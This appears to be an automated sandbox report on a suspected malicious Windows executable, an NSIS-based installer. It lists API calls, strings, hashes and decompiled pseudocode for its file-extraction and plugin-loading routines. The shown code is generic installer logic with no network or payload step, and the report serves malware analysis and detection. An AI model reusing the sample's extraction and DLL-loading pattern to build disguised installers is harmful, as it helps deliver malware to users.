                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402d9e
                                                                                                            0x00402dc1
                                                                                                            0x00402dc7
                                                                                                            0x00402dd7
                                                                                                            0x00402dd7
                                                                                                            0x00402dda
                                                                                                            0x00402de0
                                                                                                            0x00402de2
                                                                                                            0x00000000
                                                                                                            0x00402d00

                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402C86
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\5t2CmTUhKc.exe,00000400), ref: 00402CA2
                                                                                                              • Part of subcall function 0040583D: GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\5t2CmTUhKc.exe,80000000,00000003), ref: 00405841
                                                                                                              • Part of subcall function 0040583D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\5t2CmTUhKc.exe,C:\Users\user\Desktop\5t2CmTUhKc.exe,80000000,00000003), ref: 00402CEB
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E32
                                                                                                            Strings
                                                                                                            • soft, xrefs: 00402D62
                                                                                                            • Error launching installer, xrefs: 00402CC2
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C72, 00402E4A
                                                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E7B
                                                                                                            • "C:\Users\user\Desktop\5t2CmTUhKc.exe" , xrefs: 00402C7F
                                                                                                            • C:\Users\user\Desktop, xrefs: 00402CCD, 00402CD2, 00402CD8
                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EC9
                                                                                                            • C:\Users\user\Desktop\5t2CmTUhKc.exe, xrefs: 00402C8C, 00402C9B, 00402CAF, 00402CCC
                                                                                                            • Inst, xrefs: 00402D59
                                                                                                            • Null, xrefs: 00402D6B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                            • String ID: "C:\Users\user\Desktop\5t2CmTUhKc.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\5t2CmTUhKc.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                            • API String ID: 2803837635-3748817716
                                                                                                            • Opcode ID: 60ceed3c27925db81e17521e951e0acb4c8af2ccd94a95ed00efa1934550f9a0
                                                                                                            • Instruction ID: 0b72a330c31c6d4d52753dad6a5c3012229d4666e6dae103a7747cbc92612fb8
                                                                                                            • Opcode Fuzzy Hash: 60ceed3c27925db81e17521e951e0acb4c8af2ccd94a95ed00efa1934550f9a0
                                                                                                            • Instruction Fuzzy Hash: B761E231A40215ABDB20DF64DE49B9E7BB4EB04315F20407BF904B62D2D7BC9E458B9C
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029F6(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004056C6(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405659(E00405B66(0x409b70, "C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b70);
					E00405B66();
				}
				E00405DC8(0x409b70);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E61(0x409b70);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040581E(0x409b70);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040583D(0x409b70, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404F04(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405B66(0x40a370, 0x424000);
						E00405B66(0x424000, 0x409b70);
						E00405B88(_t75, 0x40a370, 0x409b70, "C:\Users\engineer\AppData\Local\Temp\nse5FEA.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405B66(0x424000, 0x40a370);
						_t62 = E00405427("C:\Users\engineer\AppData\Local\Temp\nse5FEA.tmp\System.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b70);
								_push(0xfffffffa);
								E00404F04();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404F04(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F18(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405B88(_t75, _t80, 0x409b70, 0x409b70, 0xffffffee);
					} else {
						E00405B88(_t75, _t80, 0x409b70, 0x409b70, 0xffffffe9);
						lstrcatA(0x409b70,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b70);
					E00405427();
					goto L29;
				}
				goto L33;
			}
















                                                                                                            0x00401734
                                                                                                            0x0040173b
                                                                                                            0x00401744
                                                                                                            0x00401747
                                                                                                            0x0040174a
                                                                                                            0x0040174f
                                                                                                            0x00401757
                                                                                                            0x00401773
                                                                                                            0x00401759
                                                                                                            0x00401759
                                                                                                            0x0040175a
                                                                                                            0x0040175a
                                                                                                            0x00401779
                                                                                                            0x00401783
                                                                                                            0x00401783
                                                                                                            0x00401787
                                                                                                            0x0040178a
                                                                                                            0x0040178f
                                                                                                            0x00401791
                                                                                                            0x00401793
                                                                                                            0x00401798
                                                                                                            0x00401798
                                                                                                            0x004017a3
                                                                                                            0x004017a3
                                                                                                            0x004017b4
                                                                                                            0x004017b6
                                                                                                            0x004017b6
                                                                                                            0x004017b7
                                                                                                            0x004017b7
                                                                                                            0x004017ba
                                                                                                            0x004017bd
                                                                                                            0x004017c0
                                                                                                            0x004017c0
                                                                                                            0x004017c7
                                                                                                            0x004017d6
                                                                                                            0x004017db
                                                                                                            0x004017de
                                                                                                            0x004017e1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004017e3
                                                                                                            0x004017e6
                                                                                                            0x00401840
                                                                                                            0x00401845
                                                                                                            0x004015a8
                                                                                                            0x0040265c
                                                                                                            0x0040265c
                                                                                                            0x0040288b
                                                                                                            0x0040288e
                                                                                                            0x0040288e
                                                                                                            0x00000000
                                                                                                            0x004017e8
                                                                                                            0x004017ee
                                                                                                            0x004017f9
                                                                                                            0x00401806
                                                                                                            0x00401811
                                                                                                            0x00401827
                                                                                                            0x00401827
                                                                                                            0x0040182a
                                                                                                            0x00000000
                                                                                                            0x00401830
                                                                                                            0x00401830
                                                                                                            0x00401831
                                                                                                            0x0040184e
                                                                                                            0x00402894
                                                                                                            0x00402894
                                                                                                            0x00402894
                                                                                                            0x00401833
                                                                                                            0x00401833
                                                                                                            0x00401834
                                                                                                            0x00401492
                                                                                                            0x0040220e
                                                                                                            0x0040220e
                                                                                                            0x0040220e
                                                                                                            0x00401831
                                                                                                            0x0040182a
                                                                                                            0x00402896
                                                                                                            0x0040289a
                                                                                                            0x0040289a
                                                                                                            0x0040185e
                                                                                                            0x00401863
                                                                                                            0x00401871
                                                                                                            0x00401876
                                                                                                            0x0040187c
                                                                                                            0x00401880
                                                                                                            0x00401882
                                                                                                            0x0040188a
                                                                                                            0x00401896
                                                                                                            0x00401884
                                                                                                            0x00401884
                                                                                                            0x00401888
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00401888
                                                                                                            0x0040189f
                                                                                                            0x004018a5
                                                                                                            0x004018a7
                                                                                                            0x00000000
                                                                                                            0x004018ad
                                                                                                            0x004018ad
                                                                                                            0x004018b0
                                                                                                            0x004018c8
                                                                                                            0x004018b2
                                                                                                            0x004018b5
                                                                                                            0x004018be
                                                                                                            0x004018be
                                                                                                            0x004018cd
                                                                                                            0x004018d2
                                                                                                            0x00402209
                                                                                                            0x00000000
                                                                                                            0x00402209
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                                                                                              • Part of subcall function 00405B66: lstrcpynA.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73
                                                                                                              • Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                              • Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                              • Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                                              • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                              • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                              • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                              • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nse5FEA.tmp$C:\Users\user\AppData\Local\Temp\nse5FEA.tmp\System.dll$Call
                                                                                                            • API String ID: 1941528284-3043954079
                                                                                                            • Opcode ID: f1aec3e14e8b53bfedf3a96745d118412ecf568f931b37f6426065c9993612ab
                                                                                                            • Instruction ID: ca24b6133afb507e547736dc5ab02d451b7f1a2d30e0a517c5ad6537af4b780a
                                                                                                            • Opcode Fuzzy Hash: f1aec3e14e8b53bfedf3a96745d118412ecf568f931b37f6426065c9993612ab
                                                                                                            • Instruction Fuzzy Hash: 8441C131900515BBCB10BFB5DD46EAF3A79EF01369B24433BF511B11E1D63C9A418AAD
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00402F18, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E00402F18(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423ef8;
					 *0x417044 = _t44;
					SetFilePointer( *0x409018, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E00403043(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x417044 =  *0x417044 + _t57;
						_t32 = E00403043(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409018, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x417044 =  *0x417044 + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409018, 0x413040, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413040, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x417044 =  *0x417044 + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

















                                                                                                            0x00402f1d
                                                                                                            0x00402f27
                                                                                                            0x00402f30
                                                                                                            0x00402f34
                                                                                                            0x00402f3f
                                                                                                            0x00402f3f
                                                                                                            0x00402f47
                                                                                                            0x00402f49
                                                                                                            0x00402f50
                                                                                                            0x00402f6c
                                                                                                            0x00402f70
                                                                                                            0x00403039
                                                                                                            0x00403039
                                                                                                            0x00000000
                                                                                                            0x00402f7f
                                                                                                            0x00402f82
                                                                                                            0x00402f88
                                                                                                            0x00402f8f
                                                                                                            0x00402f92
                                                                                                            0x00402f9b
                                                                                                            0x00403008
                                                                                                            0x0040300e
                                                                                                            0x00403010
                                                                                                            0x00403010
                                                                                                            0x00403022
                                                                                                            0x00403026
                                                                                                            0x00000000
                                                                                                            0x00403028
                                                                                                            0x00403028
                                                                                                            0x0040302b
                                                                                                            0x00403031
                                                                                                            0x00000000
                                                                                                            0x00403031
                                                                                                            0x00402f9d
                                                                                                            0x00402fa0
                                                                                                            0x00403034
                                                                                                            0x00403034
                                                                                                            0x00402fa6
                                                                                                            0x00402fab
                                                                                                            0x00402fab
                                                                                                            0x00402fb3
                                                                                                            0x00402fb5
                                                                                                            0x00402fb5
                                                                                                            0x00402fc6
                                                                                                            0x00402fca
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402fde
                                                                                                            0x00402fe6
                                                                                                            0x00403004
                                                                                                            0x0040303b
                                                                                                            0x0040303b
                                                                                                            0x00402fed
                                                                                                            0x00402fed
                                                                                                            0x00402ff0
                                                                                                            0x00402ff3
                                                                                                            0x00402ff6
                                                                                                            0x00403000
                                                                                                            0x00000000
                                                                                                            0x00403002
                                                                                                            0x00000000
                                                                                                            0x00403002
                                                                                                            0x00403000
                                                                                                            0x00000000
                                                                                                            0x00402fe6
                                                                                                            0x00000000
                                                                                                            0x00402fab
                                                                                                            0x00402fa0
                                                                                                            0x00402f9b
                                                                                                            0x00402f92
                                                                                                            0x00402f70
                                                                                                            0x0040303c
                                                                                                            0x00403040

                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402F3F
                                                                                                            • ReadFile.KERNELBASE(00409130,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130), ref: 00402F6C
                                                                                                            • ReadFile.KERNELBASE(00413040,00004000,?,00000000,00409130,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FC6
                                                                                                            • WriteFile.KERNELBASE(00000000,00413040,?,000000FF,00000000,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FDE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: File$Read$PointerWrite
                                                                                                            • String ID: @0A
                                                                                                            • API String ID: 2113905535-1363546919
                                                                                                            • Opcode ID: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
                                                                                                            • Instruction ID: f0f891dec1baa82fcb152a6e3a42d02399587e043c2e4755ce28507b82245ee9
                                                                                                            • Opcode Fuzzy Hash: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
                                                                                                            • Instruction Fuzzy Hash: 3F315731501249EBDB21CF55DD40A9E7FBCEB843A5F20407AFA05A6190D3789F81DBA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00403043, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E00403043(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x417044; // 0x3fc5b
				_t37 = _t35 -  *0x40afb0 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BD3(1);
					return 0;
				}
				E004031F1( *0x41f054);
				SetFilePointer( *0x409018,  *0x40afb0, 0, 0); // executed
				 *0x41f050 = _t37;
				 *0x417040 = 0;
				while(1) {
					_t12 =  *0x417048; // 0x36f99
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f054;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031BF(0x413040, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f054 =  *0x41f054 + _t34;
					 *0x40afd0 = 0x413040;
					 *0x40afd4 = _t34;
					L6:
					L6:
					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
						 *0x417040 =  *0x41f050 -  *0x417044 - _a4 +  *0x40afb0;
						E00402BD3(0);
					}
					 *0x40afd8 = 0x40b040;
					 *0x40afdc = 0x8000; // executed
					_t16 = E00405F82(0x40afb8); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40afd8; // 0x40c5de
					_t40 = _t39 - 0x40b040;
					if(_t40 == 0) {
						__eflags =  *0x40afd4; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x417044; // 0x3fc5b
						if(_t18 -  *0x40afb0 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409018, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409018, 0x40b040, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40afb0 =  *0x40afb0 + _t40;
						_t53 =  *0x40afd4; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}


















                                                                                                            0x00403047
                                                                                                            0x00403054
                                                                                                            0x00403067
                                                                                                            0x0040306c
                                                                                                            0x004031ad
                                                                                                            0x004031af
                                                                                                            0x00000000
                                                                                                            0x004031b5
                                                                                                            0x00403078
                                                                                                            0x0040308b
                                                                                                            0x00403091
                                                                                                            0x00403097
                                                                                                            0x004030a2
                                                                                                            0x004030a2
                                                                                                            0x004030a7
                                                                                                            0x004030ac
                                                                                                            0x004030b4
                                                                                                            0x004030b6
                                                                                                            0x004030b6
                                                                                                            0x004030bf
                                                                                                            0x004030c6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004030cc
                                                                                                            0x004030d2
                                                                                                            0x004030d8
                                                                                                            0x00000000
                                                                                                            0x004030de
                                                                                                            0x004030e4
                                                                                                            0x00403104
                                                                                                            0x00403109
                                                                                                            0x0040310e
                                                                                                            0x00403114
                                                                                                            0x0040311a
                                                                                                            0x00403124
                                                                                                            0x0040312b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040312d
                                                                                                            0x00403133
                                                                                                            0x00403135
                                                                                                            0x00403169
                                                                                                            0x0040316f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403171
                                                                                                            0x00403173
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403175
                                                                                                            0x00403175
                                                                                                            0x00403188
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403197
                                                                                                            0x00000000
                                                                                                            0x00403197
                                                                                                            0x00403145
                                                                                                            0x0040314d
                                                                                                            0x004031a4
                                                                                                            0x004031aa
                                                                                                            0x004031aa
                                                                                                            0x00000000
                                                                                                            0x00403155
                                                                                                            0x00403155
                                                                                                            0x0040315b
                                                                                                            0x00403161
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403167
                                                                                                            0x004031a8
                                                                                                            0x004031a8
                                                                                                            0x00000000
                                                                                                            0x004031a8
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00403058
                                                                                                              • Part of subcall function 004031F1: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,?), ref: 004031FF
                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000), ref: 0040308B
                                                                                                            • WriteFile.KERNELBASE(0040B040,0040C5DE,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403145
                                                                                                            • SetFilePointer.KERNELBASE(0003FC5B,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403197
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$CountTickWrite
                                                                                                            • String ID: @0A
                                                                                                            • API String ID: 2146148272-1363546919
                                                                                                            • Opcode ID: 5717bb92db8eceb84bcfa3312431b9880db34fb8e18b0e02550951cbdd57df69
                                                                                                            • Instruction ID: c862c83604f3b109b9ae356e59bf9e99270c6d64ee518f880403d0392c1b0dc8
                                                                                                            • Opcode Fuzzy Hash: 5717bb92db8eceb84bcfa3312431b9880db34fb8e18b0e02550951cbdd57df69
                                                                                                            • Instruction Fuzzy Hash: 4B41ABB25042029FD710CF29EE4096A7FBDF748356705423BE501BA2E1CB3C6E099B9E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 60%
                                                                                                            			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423f28 =  *0x423f28 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E004029F6(0xfffffff0);
				 *(_t34 + 8) = E004029F6(1);
				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404F04(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, 0x424000, 0x40af70, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E0040364F(_t30) != 0) {
						FreeLibrary(_t30); // executed
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                                            0x00401f51
                                                                                                            0x00401f51
                                                                                                            0x00401f56
                                                                                                            0x00401f5d
                                                                                                            0x00402019
                                                                                                            0x00402164
                                                                                                            0x00402164
                                                                                                            0x0040288b
                                                                                                            0x0040288e
